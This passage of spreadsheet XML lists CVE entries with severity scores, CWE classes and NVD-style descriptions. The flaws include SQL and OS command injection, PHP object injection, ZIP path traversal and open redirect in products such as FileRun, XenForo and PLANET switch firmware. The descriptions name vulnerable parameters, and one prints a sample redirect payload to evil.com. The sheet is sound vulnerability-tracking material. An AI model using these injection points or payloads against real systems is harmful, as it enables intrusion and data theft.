          <t>File Browser before v2.63.22 fails to validate access rules for descendants during recursive copy, rename, and delete operations, allowing authenticated users to bypass path-based access controls. Attackers can copy, rename, or delete denied files by operating on their allowed parent directory, defeating rule-based isolation for confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M1433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73612</t>
        </is>
      </c>
    </row>
    <row r="1434">
      <c r="A1434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73670</t>
        </is>
      </c>
      <c r="C1434" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1434" s="5" t="inlineStr"/>
      <c r="F1434" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1434" s="5" t="inlineStr"/>
      <c r="H1434" s="5" t="inlineStr"/>
      <c r="I1434" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1434" s="5" t="inlineStr"/>
      <c r="K1434" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1434" s="5" t="inlineStr">
        <is>
          <t>A CMS contains a SQL injection vulnerability in admin/db_data.php at line 509 that allows authenticated administrators to inject arbitrary SQL into a SHOW COLUMNS FROM statement by supplying unsanitized input through the table_name GET or POST parameter. Attackers can perform table traversal, time-based blind, boolean-based blind, and error-based injection techniques to enumerate full database schema, access system tables such as information_schema, and chain the disclosure with secondary injection points to extract credential data.</t>
        </is>
      </c>
      <c r="M1434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73670</t>
        </is>
      </c>
    </row>
    <row r="1435">
      <c r="A1435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73694</t>
        </is>
      </c>
      <c r="C1435" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1435" s="5" t="inlineStr"/>
      <c r="F1435" s="5" t="inlineStr"/>
      <c r="G1435" s="5" t="inlineStr"/>
      <c r="H1435" s="5" t="inlineStr"/>
      <c r="I1435" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1435" s="5" t="inlineStr"/>
      <c r="K1435" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1435" s="5" t="inlineStr">
        <is>
          <t>FileRun before 2026.3.0 contains an OS command injection vulnerability caused by a no-op redefinition of escapeshellcmd() in CLI.php that strips shell-metacharacter escaping, allowing attacker-controlled input to reach an exec() sink unsanitized. Attackers can exploit this through an interactive path via image_preview.php with a crafted args parameter requiring superuser authentication, or through a persistent path by storing malicious payloads in thumbnails_ffmpeg_args or thumbnails_ffmpeg_ss that execute when any user triggers video thumbnail generation.</t>
        </is>
      </c>
      <c r="M1435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73694</t>
        </is>
      </c>
    </row>
    <row r="1436">
      <c r="A1436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73698</t>
        </is>
      </c>
      <c r="C1436" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1436" s="5" t="inlineStr"/>
      <c r="F1436" s="5" t="inlineStr"/>
      <c r="G1436" s="5" t="inlineStr"/>
      <c r="H1436" s="5" t="inlineStr"/>
      <c r="I1436" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1436" s="5" t="inlineStr"/>
      <c r="K1436" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1436" s="5" t="inlineStr">
        <is>
          <t>FileRun before 2026.3.0 contains a SQL injection vulnerability that allows delegated or simple administrators to execute arbitrary SQL by submitting the description parameter as an array, causing the getValuesString() method in DB/DP.php to interpolate raw array values directly into an INSERT statement without parameterization. Because the underlying PDO connection uses emulated prepared statements enabling stacked queries, attackers can manipulate the df_users_permissions table to escalate a delegated administrator account to superuser privileges, and may additionally achieve code execution via unsanitized path values passed to require_once in the logs listing component.</t>
        </is>
      </c>
      <c r="M1436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73698</t>
        </is>
      </c>
    </row>
    <row r="1437">
      <c r="A1437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73699</t>
        </is>
      </c>
      <c r="C1437" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1437" s="5" t="inlineStr"/>
      <c r="F1437" s="5" t="inlineStr"/>
      <c r="G1437" s="5" t="inlineStr"/>
      <c r="H1437" s="5" t="inlineStr"/>
      <c r="I1437" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1437" s="5" t="inlineStr"/>
      <c r="K1437" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1437" s="5" t="inlineStr">
        <is>
          <t>FileRun before 2026.3.0 contains a PHP object injection vulnerability that allows authenticated attackers to execute arbitrary code by exploiting incorrect options passed to unserialize() in the Perms::getPerms() method, where a positional array is used instead of the required named-key array to disable class instantiation. Attackers with database write access can inject a serialized gadget chain into the permissions table columns processed on every authenticated page load to write arbitrary files, such as PHP webshells, to web-accessible paths.</t>
        </is>
      </c>
      <c r="M1437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73699</t>
        </is>
      </c>
    </row>
    <row r="1438">
      <c r="A1438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74239</t>
        </is>
      </c>
      <c r="C1438" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1438" s="5" t="inlineStr"/>
      <c r="F1438" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1438" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1438" s="5" t="inlineStr"/>
      <c r="I1438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1438" s="5" t="inlineStr"/>
      <c r="K1438" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1438" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a path traversal vulnerability in the style archive importer on Windows deployments that allows authenticated non-super administrators with style permissions to write arbitrary files outside the intended extraction directory by using backslash-based traversal sequences in ZIP member names. Attackers can craft a malicious ZIP archive with backslash path separators that bypass forward-slash validation to write arbitrary bytes to any web-server-writable path, including the public web root, achieving persistent code execution as the web-server account.</t>
        </is>
      </c>
      <c r="M1438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t>
        </is>
      </c>
    </row>
    <row r="1439">
      <c r="A1439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75121</t>
        </is>
      </c>
      <c r="C1439" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1439" s="5" t="inlineStr"/>
      <c r="F1439" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1439" s="5" t="inlineStr"/>
      <c r="H1439" s="5" t="inlineStr"/>
      <c r="I1439" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1439" s="5" t="inlineStr"/>
      <c r="K1439" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1439" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated OS command injection vulnerability in /cgi-bin/dispatcher.cgi. The web_vlan_membership_edit_dialog_post handler incorporates the memberTags POST parameter into a shell command without sanitization. A remote authenticated attacker can send a crafted memberTags value to execute arbitrary operating-system commands on the device.</t>
        </is>
      </c>
      <c r="M1439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75121</t>
        </is>
      </c>
    </row>
    <row r="1440">
      <c r="A1440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75122</t>
        </is>
      </c>
      <c r="C1440" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1440" s="5" t="inlineStr"/>
      <c r="F1440" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1440" s="5" t="inlineStr"/>
      <c r="H1440" s="5" t="inlineStr"/>
      <c r="I1440" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1440" s="5" t="inlineStr"/>
      <c r="K1440" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1440" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated OS command injection vulnerability in /cgi-bin/httpuploadcert.cgi. The certificate password field in a certificate upload request is incorporated into a shell command without sanitization of shell metacharacters. A remote attacker with administrator web credentials can submit a crafted certificate upload request to execute arbitrary operating-system commands on the device.</t>
        </is>
      </c>
      <c r="M1440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75122</t>
        </is>
      </c>
    </row>
    <row r="1441">
      <c r="A1441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75123</t>
        </is>
      </c>
      <c r="C1441" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1441" s="5" t="inlineStr"/>
      <c r="F1441" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1441" s="5" t="inlineStr"/>
      <c r="H1441" s="5" t="inlineStr"/>
      <c r="I1441" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1441" s="5" t="inlineStr"/>
      <c r="K1441" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1441" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated OS command injection vulnerability in /cgi-bin/dispatcher.cgi. The web_smtp_test_post handler incorporates a caller-supplied SMTP server value directly into a shell command without sanitization. A remote attacker with administrator web credentials can send a crafted SMTP server value to execute arbitrary operating-system commands on the device.</t>
        </is>
      </c>
      <c r="M1441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75123</t>
        </is>
      </c>
    </row>
    <row r="1442">
      <c r="A1442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75829</t>
        </is>
      </c>
      <c r="C1442" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1442" s="5" t="inlineStr"/>
      <c r="F1442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1442" s="5" t="inlineStr"/>
      <c r="H1442" s="5" t="inlineStr"/>
      <c r="I1442" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1442" s="5" t="inlineStr"/>
      <c r="K1442" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L1442" s="5" t="inlineStr">
        <is>
          <t>grav-plugi</t>
        </is>
      </c>
      <c r="M1442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75829</t>
        </is>
      </c>
    </row>
    <row r="1443">
      <c r="A1443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75833</t>
        </is>
      </c>
      <c r="C1443" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1443" s="5" t="inlineStr"/>
      <c r="F1443" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1443" s="5" t="inlineStr"/>
      <c r="H1443" s="5" t="inlineStr"/>
      <c r="I1443" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1443" s="5" t="inlineStr"/>
      <c r="K1443" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L1443" s="5" t="inlineStr">
        <is>
          <t>The Grav API plugin (getgrav/grav-plugin-api, bundled with Grav 2.0's admin-next/API stack) before version 1.0.14 contains an open redirect weakness in SsoController::sanitizeReturnTo(). The function rejects a literal '//' prefix but does not account for browsers normalizing backslashes to slashes in special (http/https) schemes, so a returnTo value such as '/\evil.com' passes the guard and is later resolved by the browser as the protocol-relative URL '//evil.com'. Following a legitimate OAuth login flow, an attacker-supplied returnTo parameter could redirect an authenticated victim to an attacker-controlled site for post-login phishing. Full browser-side exploitability depends on the admin-next SPA's client-side oauth-callback handler and was not independently verified by the reporter.</t>
        </is>
      </c>
      <c r="M1443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75833</t>
        </is>
      </c>
    </row>
    <row r="1444">
      <c r="A1444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75990</t>
        </is>
      </c>
      <c r="C1444" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1444" s="5" t="inlineStr"/>
      <c r="F1444" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1444" s="5" t="inlineStr"/>
      <c r="H1444" s="5" t="inlineStr"/>
      <c r="I1444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1444" s="5" t="inlineStr"/>
      <c r="K1444" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1444" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an Incorrect Authorization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M1444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75990</t>
        </is>
      </c>
    </row>
    <row r="1445">
      <c r="A1445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75991</t>
        </is>
      </c>
      <c r="C1445" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1445" s="5" t="inlineStr"/>
      <c r="F1445" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1445" s="5" t="inlineStr"/>
      <c r="H1445" s="5" t="inlineStr"/>
      <c r="I1445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1445" s="5" t="inlineStr"/>
      <c r="K1445" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1445" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an Improper Input Validation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M1445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75991</t>
        </is>
      </c>
    </row>
    <row r="1446">
      <c r="A1446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76190</t>
        </is>
      </c>
      <c r="C1446" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1446" s="5" t="inlineStr"/>
      <c r="F1446" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1446" s="5" t="inlineStr"/>
      <c r="H1446" s="5" t="inlineStr"/>
      <c r="I1446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1446" s="5" t="inlineStr"/>
      <c r="K1446" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L1446" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M1446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76190</t>
        </is>
      </c>
    </row>
    <row r="1447">
      <c r="A1447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76199</t>
        </is>
      </c>
      <c r="C1447" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1447" s="5" t="inlineStr"/>
      <c r="F1447" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1447" s="5" t="inlineStr"/>
      <c r="H1447" s="5" t="inlineStr"/>
      <c r="I1447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1447" s="5" t="inlineStr"/>
      <c r="K1447" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L1447" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an Uncontrolled Search Path Element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M1447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t>
        </is>
      </c>
    </row>
    <row r="1448">
      <c r="A1448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77109</t>
        </is>
      </c>
      <c r="C1448" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1448" s="5" t="inlineStr"/>
      <c r="F1448" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1448" s="5" t="inlineStr"/>
      <c r="H1448" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I1448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1448" s="5" t="inlineStr"/>
      <c r="K1448" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1448" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to restricted resources. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M1448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77109</t>
        </is>
      </c>
    </row>
    <row r="1449">
      <c r="A1449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77774</t>
        </is>
      </c>
      <c r="C1449" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1449" s="5" t="inlineStr"/>
      <c r="F1449" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1449" s="5" t="inlineStr"/>
      <c r="H1449" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I1449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1449" s="5" t="inlineStr"/>
      <c r="K1449" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1449" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized read access. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M1449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77774</t>
        </is>
      </c>
    </row>
    <row r="1450">
      <c r="A1450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78302</t>
        </is>
      </c>
      <c r="C1450" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1450" s="5" t="inlineStr"/>
      <c r="F1450" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1450" s="5" t="inlineStr"/>
      <c r="H1450" s="5" t="inlineStr"/>
      <c r="I1450" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1450" s="5" t="inlineStr"/>
      <c r="K1450" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1450" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Unauthenticated Stored Cross-Site Scripting (XSS) via Unescaped Output in Views and Admin Lists in SP Property &lt; 4.1.4 - Multiple template files across frontend views and administrator list tables rendered attributes and text values directly into HTML without contextual escaping.</t>
        </is>
      </c>
      <c r="M1450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78302</t>
        </is>
      </c>
    </row>
    <row r="1451">
      <c r="A1451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79322</t>
        </is>
      </c>
      <c r="C1451" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1451" s="5" t="inlineStr"/>
      <c r="F1451" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1451" s="5" t="inlineStr"/>
      <c r="H1451" s="5" t="inlineStr">
        <is>
          <t>mageplaza:mageplaza_blog</t>
        </is>
      </c>
      <c r="I1451" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1451" s="5" t="inlineStr"/>
      <c r="K1451" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1451" s="5" t="inlineStr">
        <is>
          <t>SQL injection in the RelatedProduct block in Mageplaza Blog for Magento 2 (mageplaza/magento-2-blog-extension) through 4.3.2 allows remote unauthenticated attackers to execute arbitrary SQL commands and read arbitrary database contents via the id parameter to /mpblog/post/view.</t>
        </is>
      </c>
      <c r="M1451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79322</t>
        </is>
      </c>
    </row>
    <row r="1452">
      <c r="A1452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79697</t>
        </is>
      </c>
      <c r="C1452" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1452" s="5" t="inlineStr"/>
      <c r="F1452" s="5" t="n">
        <v>0.034</v>
      </c>
      <c r="G1452" s="5" t="inlineStr"/>
      <c r="H1452" s="5" t="inlineStr"/>
      <c r="I1452" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1452" s="5" t="inlineStr"/>
      <c r="K1452" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="L1452" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Advantech WISE-6610-NB, WISE-6610-EB, WISE-6610-TB, WISE-6610-JB, WISE-6610-CB, WISE-6610-EL-NB, WISE-6610-EL-EB, WISE-6610-EL-TB, WISE-6610-EL-JB, WISE-6610-EL-CB, WISE-6610P-DEA, WISE-6610P-DNA and WISE-6610P-DTA 1.2.1_20251110. This affects the function basicstation_apply of the component Basic Station Certificate-Deletion Handler. This manipulation of the argument act causes command injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 1.2.4_20260821 is able to mitigate this issue. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.</t>
        </is>
      </c>
      <c r="M1452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79697</t>
        </is>
      </c>
    </row>
    <row r="1453">
      <c r="A1453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79698</t>
        </is>
      </c>
      <c r="C1453" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1453" s="5" t="inlineStr"/>
      <c r="F1453" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G1453" s="5" t="inlineStr"/>
      <c r="H1453" s="5" t="inlineStr"/>
      <c r="I1453" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1453" s="5" t="inlineStr"/>
      <c r="K1453" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="L1453" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Advantech WISE-6610-NB, WISE-6610-EB, WISE-6610-TB, WISE-6610-JB, WISE-6610-CB, WISE-6610-EL-NB, WISE-6610-EL-EB, WISE-6610-EL-TB, WISE-6610-EL-JB, WISE-6610-EL-CB, WISE-6610P-DEA, WISE-6610P-DNA and WISE-6610P-DTA 1.2.1_20251110. This vulnerability affects the function nodered_lib_apply of the component Node-RED Library. Such manipulation of the argument act leads to command injection. The attack can be launched remotely. The exploit is publicly available and might be used. Upgrading to version 1.2.4_20260821 is able to resolve this issue. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.</t>
        </is>
      </c>
      <c r="M1453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79698</t>
        </is>
      </c>
    </row>
    <row r="1454">
      <c r="A1454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79721</t>
        </is>
      </c>
      <c r="C1454" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1454" s="5" t="inlineStr"/>
      <c r="F1454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1454" s="5" t="inlineStr"/>
      <c r="H1454" s="5" t="inlineStr"/>
      <c r="I1454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1454" s="5" t="inlineStr"/>
      <c r="K1454" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L1454" s="5" t="inlineStr">
        <is>
          <t>Code execution can occur in versions of the MLflow platform running version 0.0.1 or newer, enabling a maliciously crafted model artifact to execute arbitrary code on an end user's system when loaded by the project.</t>
        </is>
      </c>
      <c r="M1454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79721</t>
        </is>
      </c>
    </row>
    <row r="1455">
      <c r="A1455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80097</t>
        </is>
      </c>
      <c r="C1455" s="5" t="n">
        <v>8.6</v>
